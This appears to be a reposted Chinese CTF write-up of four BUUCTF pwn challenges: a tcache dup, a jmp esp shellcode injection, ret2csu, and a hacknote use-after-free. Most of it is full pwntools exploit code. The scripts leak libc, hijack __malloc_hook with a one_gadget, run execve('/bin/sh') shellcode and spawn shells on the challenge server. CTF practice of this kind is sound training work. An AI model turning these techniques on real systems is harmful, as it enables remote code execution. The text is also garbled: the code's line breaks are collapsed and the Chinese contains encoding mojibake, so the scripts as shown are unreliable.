PWN-PRACTICE-BUUCTF-18

• • ciscn_2019_final_3
  • ciscn_2019_s_9
  • jarvisoj_level5
  • pwnable_hacknote

ciscn_2019_final_3

tcache dup
參考：[V&N2020 公開賽]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些簡單利用方法

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./ciscn_final_3") io=remote("node4.buuoj.cn",27750) elf=ELF("./ciscn_final_3") libc=ELF("./libc.so.6")def add(index,size,content):io.sendlineafter("choice > ","1")io.sendlineafter("input the index\n",str(index))io.sendlineafter("input the size\n",str(size))io.sendlineafter("write something\n",content) def free(index):io.sendlineafter("choice > ","2")io.sendlineafter("input the index\n",str(index))#gdb.attach(io) #pause()add(0,0x78,"aaaa") io.recvuntil("gift :0x") addr=int(io.recvuntil("\n")[:-1],16) print("addr=="+hex(addr)) add(1,0x18,"bbbb") add(2,0x78,"cccc") add(3,0x78,"cccc") add(4,0x78,"cccc") add(5,0x78,"cccc") add(6,0x78,"cccc") add(7,0x78,"cccc") add(8,0x78,"cccc") add(9,0x78,"cccc") add(10,0x78,"cccc") add(11,0x78,"cccc") add(12,0x28,"cccc")#pause()free(12)#pause()free(12)#pause()add(13,0x28,p64(addr-0x10))#pause()add(14,0x28,p64(addr-0x10))#pause()add(15,0x28,p64(0)+p64(0x421))#pause()free(0)#pause()free(1)#pause()add(16,0x78,"abcd")#pause()add(17,0x18,"1234")#pause()add(18,0x18,"5678")#pause()io.recvuntil("gift :0x") libc_base=int(io.recvuntil("\n")[:-1],16)-0x3ebca0 malloc_hook=libc_base+libc.sym["__malloc_hook"] print("malloc_hook=="+hex(malloc_hook)) one_gadget=libc_base+0x10a38c print("one_gadget=="+hex(one_gadget))#pause()free(6) free(6)#pause()add(19,0x78,p64(malloc_hook)) add(20,0x78,p64(malloc_hook))#pause()add(21,0x78,p64(one_gadget))#pause()io.sendlineafter("choice > ","1") io.sendlineafter("input the index\n","22") io.sendlineafter("input the size\n","0")#pause()io.interactive()

ciscn_2019_s_9

保護(hù)幾乎全沒開，無NX，堆?？蓤?zhí)行
利用hint的jmp esp實(shí)現(xiàn)ret2shellcode

from pwn import * #io=process('./ciscn_2019_s_9') io=remote("node4.buuoj.cn",29490) jmp_esp=0x8048554 shellcode="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" payload=shellcode.ljust(0x24,'\x00')+p32(jmp_esp) payload+=asm("sub esp,40;call esp") io.sendline(payload) io.interactive()

jarvisoj_level5

棧溢出，ret2csu

from pwn import * #context.log_level='debug' #io=process('./jarvisoj_level5') io=remote("node4.buuoj.cn",28595) elf=ELF('./jarvisoj_level5') libc=ELF('./libc-2.23-x64.so') part1=0x4006AA part2=0x400690 write_plt=elf.plt['write'] write_got=elf.got['write'] read_got=elf.got['read'] main_addr=elf.sym['main'] pop_rdi=0x4006b3 io.recvuntil('Input:\n') payload='a'*(0x80+8) def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):payload = p64(part1) # part1 entry pop_rbx_rbp_r12_r13_r14_r15_retpayload += p64(0x0) # rbx must be 0x0payload += p64(0x1) # rbp must be 0x1payload += p64(jmp2) # r12 jump topayload += p64(arg3) # r13 -> rdx arg3payload += p64(arg2) # r14 -> rsi arg2payload += p64(arg1) # r15d -> edi arg1payload += p64(part2) # part2 entry will call [r12+rbx*0x8]payload += 'A' * 56 # junk 6*8+8=56return payload payload+=com_gadget(part1,part2,write_got,1,read_got,8) payload+=p64(main_addr) io.sendline(payload) read_addr=u64(io.recv(6).ljust(8,'\x00')) print(hex(read_addr)) libc_base=read_addr-libc.sym['read'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next() io.recvuntil('Input:\n') payload='a'*(0x80+8)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main_addr) io.sendline(payload) io.interactive()

pwnable_hacknote

UAF，參考：pwnable.tw 堆一hacknote

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./hacknote") io=remote("node4.buuoj.cn",29535) elf=ELF("./hacknote") libc=ELF("./libc-2.23-16-x32.so") read_got=elf.got["read"]def add(size,content):io.sendlineafter("Your choice :","1")io.sendlineafter("Note size :",str(size))io.sendlineafter("Content :",content) def delete(index):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index)) def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index)) def exit():io.sendlineafter("Your choice :","4")add(0x18,"aaaa")#0 add(0x18,"bbbb")#1 delete(0) delete(1) add(0x8,p32(0x0804862B)+p32(read_got)) show(0) read_addr=u32(io.recv(4)) print("read_addr=="+hex(read_addr)) libc_base=read_addr-libc.sym["read"] system=libc_base+libc.sym["system"] delete(2) add(0x8,p32(system)+";sh") show(0) io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-18的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。